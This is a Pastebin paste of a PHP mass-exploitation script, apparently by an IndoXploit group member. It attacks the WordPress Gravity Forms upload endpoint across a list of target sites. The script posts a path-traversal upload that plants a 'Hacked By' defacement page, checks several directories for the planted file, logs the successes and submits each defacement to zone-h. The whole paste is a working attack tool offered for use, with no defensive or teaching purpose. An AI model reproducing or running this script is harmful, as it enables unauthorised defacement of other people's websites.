Advertisement
Tu5b0l3d

gravityforms

May 7th, 2016
727
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.26 KB | None | 0 0
  1. <?php
  2. // Tu5b0l3d -IndoXploit-
  3. error_reporting(0);
  4.  
  5. function ngirim_data($url, $post){
  6.        
  7. $ch = curl_init ("$url");
  8. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  9. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  10. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  11. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  12. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  13. curl_setopt ($ch, CURLOPT_POST, 1);
  14. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  15. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  16. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  17. $data6 = curl_exec ($ch);
  18. return $data6;
  19.     }
  20.  
  21.     function save($data){
  22.         $fp = @fopen("hasil_gravity_baruuu.htm", "a") or die("cant open file");
  23.         fwrite($fp, $data);
  24.         fclose($fp);
  25. }
  26.  
  27. $buka=fopen("$argv[1]","r");
  28. $size=filesize("$argv[1]");
  29. $baca=fread($buka,$size);
  30. $sites = explode("<br>", $baca);
  31.  
  32. foreach($sites as $site){
  33. $target = $site;
  34.  
  35.  
  36. $dir = array("", "wp-content", "wp-content/uploads", "wp-content/uploads/gravity_forms");
  37.  
  38.  
  39. $payload = "<head>
  40. <meta name='description' content='Hacked By Tu5b0l3d'>
  41. <title>Hacked By Tu5b0l3d</title>
  42. <link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>
  43. <style>
  44. img{
  45.  width: 30%;
  46.  height: 50%;
  47. }
  48. </style>
  49. </head>
  50. <body bgcolor='black'> <center>
  51. <br><br><img src='http://selapan.hol.es/modif.jpg'><br><br>
  52. <b><font size='6px' face='Abel' color='white'>Hacked by Tu5b0l3d<br></b></font>
  53.  
  54. <font face='Abel' color='white'><a href='http://indoxploit.blogspot.co.id/' style='text-decoration:none;color:red;font-size:20px;'>#IndoXploit</a><br>
  55. <br><br><i>Mr. Error 404 - Shor7cut - Bunglon ijo - Sohai - Jack Wilder - Tomhawk <br> Cyber_taregh - k3c0t - Rieqyns13 - Falcon-G21 </i>
  56. </center></font>
  57. <font color='black'>&field_id=k&form_id=1&gform_unique_id=../../../../../&name=.htm";
  58.  
  59. $url = "http://$target/?gf_page=upload";
  60. echo "\n$url";
  61.  
  62. $upload = ngirim_data($url, $payload);
  63. if(preg_match("/_input_k_/i", $upload)){
  64.                        foreach($dir as $path){
  65.                         $path_anu = "http://$target/$path/_input_k_.htm";
  66.  
  67. $ch1 = curl_init ("$path_anu");
  68. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  69. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  70. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
  71. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  72. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  73. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  74. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  75. $hacked = curl_exec ($ch1);
  76.  
  77.                         if(preg_match("/hacked/i", $hacked)){
  78.                             save("$path_anu<br>");
  79.                             echo "\n$path_anu";
  80.                             $jones = "defacer=ID-IM&domain1=$path_anu&hackmode=1&reason=1&submit=Send";
  81.                             $url_jones = "http://www.zone-h.com/notify/single";
  82.                             $ngirim_jones = ngirim_data($url_jones, $jones);
  83.                             if(preg_match ("/color=\"red\">OK<\/font><\/li>/i", $ngirim_jones)){
  84.                 echo  " \n#### Ok\n";
  85.         }else{
  86.                 echo " \n#### No\n";
  87.             }   break;
  88.                            
  89.                         }
  90.  
  91.                        }
  92. }
  93. else{
  94.     echo " <============= No";
  95. }
  96. }
  97. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement